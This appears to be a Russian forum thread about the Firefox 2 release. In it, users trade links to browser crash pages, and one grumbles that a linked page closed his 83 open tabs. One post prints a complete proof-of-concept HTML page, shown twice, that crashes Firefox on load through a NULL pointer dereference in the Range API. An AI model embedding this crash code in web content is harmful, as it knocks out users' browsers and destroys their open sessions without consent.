Финальный релиз Firefox 2
Я тоже не понял, в чем прикол? Любой браузер так можно завесить. У меня Session Saver установлен и работает без сбоев, но на фига мне было сейчас перезагружать браузер с 83 открытыми вкладками? Я не имею привычки нажимать на ссылки, но я думал, что проверенным людям можно доверять.SOLDIER писал(а):Кстати, раз уж в ветке про ИЕ говорят о дырках, то у ФФ2 тоже её обнаружили. http://lcamtuf.coredump.cx/ffoxdie.html Господин Михал Залевски постаралси. ;)
- SOLDIER
- Борец за справедливость
- Сообщения: 11764
- Зарегистрирован: Пн апр 18, 2005 11:53 pm
- Откуда: Запорижжя (хохол)
Собссна описание - http://www.mozilla.org/security/announc ... 06-59.html
ФФ не падает при посещении.
ФФ не падает при посещении.
Не пытайтесь спорить с дебилом, иначе Вы опуститесь до его уровня, где он
Вас задавит своим опытом!
Вас задавит своим опытом!
Не думаю, что есть что-то странное в нежелании видеть смысл там, где его нет. Например, в названии ссылок. А даже если и попытаться его увидеть в конкретном названии, то ни из чего не следует, что он должен закрыться.SOLDIER писал(а):Странные вы люди. Название ссылки ffoxdie не насторожило? Ну ладно - я не думал, что вы её нажмёте с 85 табами. Простите. :oops:
- SOLDIER
- Борец за справедливость
- Сообщения: 11764
- Зарегистрирован: Пн апр 18, 2005 11:53 pm
- Откуда: Запорижжя (хохол)
М-да... Ишшо одну дыру нашли. То, что называется "разыменование нулевого указателя" (NULL pointer dereference). PoC - вот тут - http://werterxyz.altervista.org/Firefox2Range.htm Предупреждаю - со 100 открытыми ссылками заходить не стоит. Помимо 2-ки - успешно свалил мой ФФ 1.5.0.7. Код вот -
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
Не пытайтесь спорить с дебилом, иначе Вы опуститесь до его уровня, где он
Вас задавит своим опытом!
Вас задавит своим опытом!